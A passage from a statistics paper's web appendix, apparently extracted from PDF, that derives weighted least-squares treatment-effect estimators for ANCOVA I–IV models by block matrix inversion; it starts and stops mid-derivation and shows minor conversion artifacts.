w_{1}\overline{Y}_{1}\\ \vdots\\ w_{j}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X }}_{ijk}^{\prime}\end{array}\right),\] and \[\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}\] \[=\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0} \\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\left( \begin{array}{cc}-\mathbf{D}^{-1}\mathbf{C}(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C})^{-1}&( \mathbf{D}-\mathbf{C}\mathbf{A}^{-1}\mathbf{B})^{-1}\end{array}\right)\left(\begin{array}{ c}\frac{w_{0}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{0}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{j}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X }}_{ijk}^{\prime}\end{array}\right).\] Then \[\widehat{\mathbf{\tau}}+\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}=\left(\begin{array}{cc}\mathbf{B}_{1}&\mathbf{B}_{2}\end{array}\right) \left(\begin{array}{c}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1) -\overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{ X}}_{ijk}^{\prime}\end{array}\right),\] with \[\mathbf{B}_{1}=\left(\begin{array}{cc}\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_ {J\times J}\end{array}\right)-\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1 }-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\mathbf{D}^{- 1}\mathbf{C}\end{array}\right)(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C})^{-1},\] \[\mathbf{B}_{2}=\left(\begin{array}{cc}-\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0 }_{J\times J}\end{array}\right)\mathbf{A}^{-1}\mathbf{B}+\left(\begin{array}{c} \overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\end{array} \right)(\mathbf{D}-\mathbf{C}\mathbf{A}^{-1}\mathbf{B})^{-1}.\] We proceed by looking at \(\mathbf{B}_{2}\): \[\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\end{array}\right)\mathbf{A }^{-1}\mathbf{B}=\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\end{array} \right)\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{i}}{w_{j}^{0}w_{j}^ {1}}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}\frac{1}{w_{j}}\end{array}\right)\left( \begin{array}{c}\frac{w_{i}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^ {1}-\overline{\mathbf{X}}_{1}^{0}\right)\\ \vdots\\ \frac{w_{i}^{0}w_{1}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{ X}}_{J}^{0}\right)\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right),\] with \[-\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\end{array}\right)\mathbf{A }^{-1}\mathbf{B}+\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\bm {X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)=-\left( \begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)+\left( \begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)=\left( \begin{array}{c}\mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right),\] and thus \(\mathbf{B}_{2}=\mathbf{0}_{J\times p}\). For \(\mathbf{B}_{1}\), we first look at \(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C}\): \[\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C}=\left(\begin{array}{cc}\otimes_{j=1}^{J} \frac{w_{j}^{0}w_{1}^{1}}{w_{j}}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}w_{j}\end{array}\right)-\left(\begin{array} []{c}\frac{w_{j}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)\\ \vdots\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{ X}}_{J}^{0}\right)\\ \mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right)\mathbf{D}^{-1}\mathbf{C}\] \[=\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}^{0}w_{i}^{1}}{w_{j}}& \mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}w_{j}\end{array}\right)\left(\begin{array} []{cc}\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\mathbf{I}_{J}\end{array}\right)-\left(\begin{array}{c} \overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\\ \mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right)\mathbf{D}^{-1}\mathbf{C}\right).\] Then \[\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\mathbf{I}_{J}\end{array}\right)-\left(\begin{array}{c}\overline{ \mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\\ \mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right)\mathbf{D}^{-1}\mathbf{C}=\left(\begin{array}[] {cc}\otimes_{j=1}^{J}\frac{w_{i}}{w_{j}^{0}w_{j}^{1}}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}\frac{1}{w_{j}}\end{array}\right)\left( \mathbf{A}-\mathbf{BD}^{-1}\mathbf{C}\right),\] with \[\mathbf{B}_{1}=\left(\begin{array}{cc}\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_ {J\times J}\end{array}\right)-\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{ 1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\mathbf{D}^{- 1}\mathbf{C}\end{array}\right)\left(\mathbf{A}-\mathbf{BD}^{-1}\mathbf{C}\right)^{-1}=\left( \begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}}{w_{j}^{0}w_{j}^{1}}&\mathbf{0}_{ J\times J}\end{array}\right).\] Thus \[\widehat{\mathbf{\tau}}+\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline {\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}=\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}}{w_{j}^{0 }w_{j}^{1}}&\mathbf{0}_{J\times J}&\mathbf{0}_{J\times p}\end{array}\right)\left( \begin{array}{c}\frac{w_{0}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{ X}}_{ijk}^{\prime}\end{array}\right)=\left(\begin{array}{c}\overline{y}_{1}(1)- \overline{y}_{1}(0)\\ \vdots\\ \overline{y}_{J}(1)-\overline{y}_{J}(0)\end{array}\right).\] We therefore have \[\widehat{\mathbf{\tau}} =\left(\begin{array}{c}\overline{y}_{1}(1)-\overline{y}_{1}(0) \\ \vdots\\ \overline{y}_{J}(1)-\overline{y}_{J}(0)\end{array}\right)-\left(\begin{array}[] {c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}\] \[=\left(\begin{array}{c}\overline{u}_{1}(1)-\overline{u}_{1}(0) \\ \vdots\\ \overline{u}_{J}(1)-\overline{u}_{J}(0)\end{array}\right)=\left(\begin{array}[] {c}\left(\overline{y}_{1}(1)-\overline{\mathbf{X}}_{1}^{1}\widehat{\mathbf{\gamma}} \right)-\left(\overline{y}_{1}(0)-\widetilde{\mathbf{X}}_{1}^{0}\widehat{\mathbf{ \gamma}}\right)\\ \vdots\\ \left(\overline{y}_{J}(1)-\overline{\mathbf{X}}_{J}^{1}\widehat{\mathbf{\gamma}} \right)-\left(\overline{y}_{J}(0)-\widetilde{\mathbf{X}}_{J}^{0}\widehat{\mathbf{ \gamma}}\right)\end{array}\right).\] ### Web Appendix A1.2 ANCOVA II We apply the same centering approach to ANCOVA II, and obtain the following model: \[Y_{ijk}=\sum_{j^{\prime}=1}^{J}\beta_{j^{\prime}}\mathbb{I}_{ijk,j^{\prime}} +\sum_{j^{\prime}=1}^{J}\tau_{j^{\prime}}\mathbb{I}_{ijk,j^{\prime}}\widetilde {\mathbf{Z}}_{ij^{\prime}}+\sum_{j^{\prime}=1}^{J}\mathbb{I}_{ijk,j^{\prime}} \widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}_{j^{\prime}}+e_{ijk}.\] Under ANCOVA II, we have the following design matrix \[\mathbf{D}_{i}=\left(\begin{array}{cc}\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_ {N_{ij}}&\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}&\otimes_{j=1}^{J}\widetilde{\mathbf{X}}_ {ij}\end{array}\right).\] Then \[\mathbf{D}_{i}^{\prime}=\left(\begin{array}{c}\otimes_{j=1}^{J}\widetilde{Z}_{ij }\mathbf{1}_{N_{ij}}\\ \otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime}\\ \otimes_{j=1}^{J}\widetilde{\mathbf{X}}_{ij}^{\prime}\end{array}\right),\ \ \mathbf{W}_{i}=\otimes_{j=1}^{J}\mathbf{W}_{ij},\ \ \mathbf{W}_{ij}=\left(\otimes_{k=1}^{N_{ij}}w_{ijk}\right),\ \ \mathbf{Y}_{i}=\left( \begin{array}{c}\mathbf{Y}_{i1}\\ \vdots\\ \mathbf{Y}_{iJ}\end{array}\right).\] The estimated regression coefficient vector \((\widehat{\tau}_{1},\ldots,\widehat{\tau}_{j},\widehat{\beta}_{1},\ldots,\widehat{ \beta}_{J},\widehat{\gamma}_{1}^{\prime},\ldots,\widehat{\gamma}_{J}^{\prime}) ^{\prime}=\left(\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}\right)^ {-1}\left(\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}\right)\). \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}=\sum_{i=1}^{ I}\left(\begin{array}{cc}\otimes_{j=1}^{J}\left(\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{ \prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left(\widetilde{Z}_{ ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J} \left(\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{\widetilde{X}}_{ij}\right)\\ \otimes_{j=1}^{J}\left(\widetilde{Z}_{ij}\mathbf{\widetilde{X}}_{ij}^{\prime}\mathbf{ W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left(\widetilde{\mathbf{X}}_{ij}^{ \prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left(\mathbf{\widetilde {X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{\widetilde{X}}_{ij}\right)\end{array}\right)\] \[=\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}^{0}w_{j}^{ 1}}{w_{j}}&\mathbf{0}_{J\times J}&\otimes_{j=1}^{J}\frac{w_{j}^{0}w_{j}^{1}}{w_{j} }\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\mathbf{X}}_{j}^{\prime}\right)\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}w_{j}&\mathbf{0}_{J\times pJ}\\ \otimes_{j=1}^{J}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{ 1}-\overline{\mathbf{X}}_{j}^{0}\right)^{\prime}&\mathbf{0}_{pJ\times J}&\otimes_{j= 1}^{J}\sum_{i=1}^{N_{ij}}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}\widetilde{\mathbf{X}}_{ijk}\end{array}\right),\] and \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}=\sum_{i=1}^{ I}\left(\begin{array}{cc}\left(\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{ \prime}\right)\mathbf{W}_{i}\mathbf{Y}_{i}\\ \left(\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime}\right)\mathbf{W}_{i}\mathbf{Y}_{i}\\ \left(\otimes_{j=1}^{J}\widetilde{\mathbf{X}}_{ij}^{\prime}\right)\mathbf{W}_{i}\mathbf{Y} _{i}\end{array}\right)=\left(\begin{array}{c}\frac{w_{1}^{0}w_{1}^{1}}{w_{1} }\left(\overline{y}_{1}(1)-\overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{J}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ik}Y_{ik}\overline{X}_{iik}^{\prime}\\ \vdots\\ \sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ik}Y_{ik}\overline{X}_{ijk}^{\prime} \end{array}\right).\] Using properties of least squares, \((\widehat{\tau}_{j},\widehat{\beta}_{j},\widehat{\gamma}_{j}^{\prime})^{\prime}\) can be estimated individually focusing on \[\sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{D}_{ij}=\sum_{i= 1}^{I}\left(\begin{array}{cc}\widetilde{Z}_{ij}^{0}\mathbf{1}_{N_{ij}}^{\prime} \mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ ij}\mathbf{1}_{N_{ij}}&\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\widetilde{X} _{ij}\\ \widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&\mathbf{1}_{N_{ ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij} \widetilde{X}_{ij}\\ \widetilde{Z}_{ij}\widetilde{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}& \widetilde{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&\widetilde{\mathbf{X} }_{ij}^{\prime}\mathbf{W}_{ij}\widetilde{X}_{ij}\end{array}\right)\] \[=\left(\begin{array}{cc}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}&0& \frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\bm {X}}_{j}^{0}\right)\\ 0&w_{j}&\mathbf{0}_{p}^{\prime}\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\bm {X}}_{j}^{0}\right)^{\prime}&\mathbf{0}_{p}&\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{X}_{ijk}\end{array}\right),\] and \[\sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}=\sum_{i= 1}^{I}\left(\begin{array}{cc}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ ij}\mathbf{Y}_{ij}\\ \mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\\ \widetilde{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\end{array}\right)=\left( \begin{array}{c}\frac{w_{j}^{0}w_{j}^{1}}{w_{1}}\left(\overline{y}_{j}(1)- \overline{y}_{j}(0)\right)\\ w_{j}\overline{Y}_{j}\\ \sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime} \end{array}\right).\] Following the same matrix inversion arguments for ANCOVA I, the expression for \(\widehat{\tau}_{j}\) can be derived as \[\widehat{\tau}_{j}=\overline{y}_{j}(1)-\overline{y}_{j}(0)-\left(\overline{\mathbf{X} }_{j}^{1}-\overline{\mathbf{X}}_{j}^{0}\right)\widehat{\gamma}_{j}=\left(\overline{y}_ {j}(1)-\widetilde{\mathbf{X}}_{j}^{1}\widehat{\gamma}_{j}\right)-\left(\overline{y}_ {j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{\gamma}_{j}\right)=\overline{u}_{j}(1)- \overline{u}_{j}(0)\] ### Web Appendix A1.3 Ancova III If we include interactions between treatment indicator and covariate vector into the model, the design matrix, using the property of least squares, we can separately estimate \((\tau_{1}^{*},\ldots,\tau_{J}^{*},\boldsymbol{\eta}^{*\prime})^{\prime}\) and \((\beta_{1},\ldots,\beta_{J},\boldsymbol{\gamma}^{\prime})^{\prime}\). Without the loss of generality, we elaborate on \((\tau_{1}^{*},\ldots,\tau_{J}^{*},\boldsymbol{\eta}^{*\prime})^{\prime}\), and \((\beta_{1},\ldots,\beta_{J},\boldsymbol{\gamma}^{\prime})^{\prime}\) follows. The design matrix for the estimation of \((\tau_{1}^{*},\ldots,\tau_{J}^{*},\boldsymbol{\eta}^{*\prime})^{\prime}\) is \[\boldsymbol{D}_{i}=\left(\begin{array}{cc}\otimes_{j=1}^{J}Z_{ij}\mathbf{1}_ {N_{ij}}&\left(\otimes_{j=1}^{J}Z_{ij}\mathbf{I}_{N_{ij}}\right)\widetilde{ \boldsymbol{X}}_{i}\end{array}\right).\] Then \[\boldsymbol{D}_{i}^{\prime}=\left(\begin{array}{cc}\otimes_{j=1}^{J}Z_{ij} \mathbf{1}_{N_{ij}}^{\prime}\\ \widetilde{\boldsymbol{X}}_{i}^{\prime}\left(\otimes_{j=1}^{J}Z_{ij} \mathbf{I}_{N_{ij}}\right)\end{array}\right),\ \ \boldsymbol{W}_{i}=\otimes_{j=1}^{J}\boldsymbol{W}_{ij},\ \ \boldsymbol{W}_{ij}=\left(\otimes_{k=1}^{N_{ij}}w_{ijk}\right),\ \ \boldsymbol{Y}_{i}=\left(\begin{array}{c} \boldsymbol{Y}_{i1}\\ \vdots\\ \boldsymbol{Y}_{iJ}\end{array}\right).\] The estimated regression coefficient vector \((\widehat{\tau}_{1}^{*},\ldots,\widehat{\tau}_{J}^{*},\widehat{\boldsymbol {\eta}}^{*\prime})^{\prime}=\left(\sum_{i=1}^{I}\boldsymbol{D}_{i}^{\prime} \boldsymbol{W}_{i}\boldsymbol{D}_{i}\right)^{-1}\left(\sum_{i=1}^{I} \boldsymbol{D}_{i}^{\prime}\boldsymbol{W}_{i}\boldsymbol{Y}_{i}\right)\). \[\sum_{i=1}^{I}\boldsymbol{D}_{i}^{\prime}\boldsymbol{W}_{i} \boldsymbol{D}_{i}\] \[=\sum_{i=1}^{I}\left(\begin{array}{cc}\otimes_{j=1}^{J}\left( Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\boldsymbol{W}_{ij}\mathbf{1}_{N_{ij}}\right)& \left(\otimes_{j=1}^{J}Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\right)\boldsymbol{W }_{i}\widetilde{\boldsymbol{X}}_{i}\\ \widetilde{\boldsymbol{X}}_{i}^{\prime}\boldsymbol{W}_{i}\left(\otimes_{j=1}^{J }Z_{ij}\mathbf{1}_{N_{ij}}\right)&\widetilde{\boldsymbol{X}}_{i}^{\prime} \left(\otimes_{j=1}^{J}Z_{ij}\mathbf{W}_{ij}\right)\widetilde{\boldsymbol{X}} _{i}\end{array}\right)\] \[=\left(\begin{array}{cc}w_{1}^{1}&w_{1}^{1}\widetilde{\boldsymbol {X}}_{1}^{1}\\ &\ddots&\vdots\\ \hline w_{1}\widetilde{\boldsymbol{X}}_{1}^{1\prime}&\cdots&w_{J}^{1} \widetilde{\boldsymbol{X}}_{J}^{1\prime}\end{array}\right),\] and \[\sum_{i=1}^{I}\boldsymbol{D}_{i}^{\prime}\boldsymbol{W}_{i} \boldsymbol{Y}_{i}=\sum_{i=1}^{I}\left(\begin{array}{c}\left(\otimes_{j=1}^{ J}Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\right)\boldsymbol{W}_{i}\boldsymbol{Y}_{i} \\ \sum_{j=1}^{J}Z_{ij}\widetilde{\boldsymbol{X}}_{ij}^{\prime}\boldsymbol{W}_{ij} \boldsymbol{Y}_{ij}\end{array}\right)=\left(\begin{array}{c}w_{1}^{1} \overline{y}_{1}(1)\\ \vdots\\ w_{1}^{J}\overline{y}_{J}(1)\\ \sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}\overline{ \boldsymbol{X}}_{ijk}^{\prime}\end{array}\right).\] Following similar arguments, we can first derive results for \[\widehat{\boldsymbol{r}}^{*}+\left(\begin{array}{c}\widetilde{\boldsymbol{X }}_{1}^{1}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{1}\end{array}\right)\widehat{\boldsymbol{\eta}} ^{*},\] and then obtain estimates for \(\widehat{\boldsymbol{\tau}}\) as \[\widehat{\boldsymbol{\tau}}^{*}=\left(\begin{array}{c}\overline{y}_{1}(1) \\ \vdots\\ \overline{y}_{J}(1)\end{array}\right)-\left(\begin{array}{c}\widetilde{ \boldsymbol{X}}_{1}^{1}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{1}\end{array}\right)\widehat{\boldsymbol{\eta}} ^{*}.\] Similarly, the estimate for \(\widehat{\boldsymbol{\beta}}\): \[\widehat{\boldsymbol{\beta}}=\left(\begin{array}{c}\overline{y}_{1}(0)\\ \vdots\\ \overline{y}_{J}(0)\end{array}\right)-\left(\begin{array}{c}\widetilde{ \boldsymbol{X}}_{1}^{0}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{0}\end{array}\right)\widehat{\boldsymbol{\gamma}}.\] Then \[\widehat{\boldsymbol{\tau}}^{w}=\widehat{\boldsymbol{\tau}}^{*}-\widehat{ \boldsymbol{\beta}}=\left(\begin{array}{c}\overline{y}_{1}(1)-\overline{y}_ {1}(0)\\ \vdots\\ \overline{y}_{J}(1)-\overline{y}_{J}(0)\end{array}\right)-\left(\begin{array}{c} \widetilde{\boldsymbol{X}}_{1}^{1}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{1}\end{array}\right)\widehat{\boldsymbol{\eta}} ^{*}+\left(\begin{array}{c}\widetilde{\boldsymbol{X}}_{1}^{0}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{0}\end{array}\right)\widehat{\boldsymbol{\gamma}}\] \[=\left(\begin{array}{c}\left(\overline{y}_{1}(1)-\overline{\mathbf{X}}_{1}^{ \ast}\widehat{\mathbf{\eta}}^{\ast}\right)-\left(\overline{y}_{1}(0)-\overline{ \mathbf{X}}_{1}^{0}\overline{\gamma}\right)\\ \vdots\\ \left(\overline{y}_{J}(1)-\overline{\mathbf{X}}_{J}^{1}\widehat{\mathbf{\eta}}^{\ast} \right)-\left(\overline{y}_{J}(0)-\overline{\mathbf{X}}_{J}^{0}\overline{\gamma} \right)\end{array}\right)=\left(\begin{array}{c}\overline{u}_{1}(1)- \overline{u}_{1}(0)\\ \vdots\\ \overline{u}_{J}(1)-\overline{u}_{J}(0)\end{array}\right).\] ### Web Appendix A1.4 Ancora IV If we further allow for period-varying covariate effects into the fully-interacted model, using the properties of least squares, we can separately estimate \((\tau_{j}^{\ast},\mathbf{\eta}_{i}^{\ast\prime})^{\prime}\), \((\beta_{j},\mathbf{\gamma}_{j}^{\prime})^{\prime}\) for each \(j=1,\ldots,J\). Similar to the ANCOVA III, we start with the estimation of \((\tau_{j}^{\ast},\mathbf{\eta}_{j}^{\ast\prime})^{\prime}\), and \((\beta_{j},\mathbf{\gamma}_{j}^{\prime})^{\prime}\) follows. The design matrix is \[\mathbf{D}_{ij}=\left(\begin{array}{cc}Z_{ij}\mathbf{1}_{N_{ij}}&Z_{ij}\overline {\mathbf{X}}_{ij}\end{array}\right).\] Then \[\mathbf{D}_{i}^{\prime}=\left(\begin{array}{cc}Z_{ij}\mathbf{1}_{N_{ij}}\\ Z_{ij}\overline{\mathbf{X}}_{ij}^{\prime}\end{array}\right),\ \ \mathbf{W}_{ij}=\left(\otimes_{k=1}^{N_{ij}}w_{ijk}\right).\] The estimated regression coefficient vector \((\widehat{\tau}_{j},\widehat{\mathbf{\eta}}_{j}^{\ast\prime})^{\prime}=\left( \sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{D}_{ij}\right)^{-1}\left( \sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\right)\), where \[\sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{D}_{ij} =\sum_{i=1}^{I}\left(\begin{array}{cc}Z_{ij}\mathbf{1}_{N_{ij}} ^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\bm {W}_{ij}\widetilde{\mathbf{X}}_{ij}\\ Z_{ij}\overline{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&Z_{ij} \overline{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\widetilde{\mathbf{X}}_{ij}\end{array}\right)\] 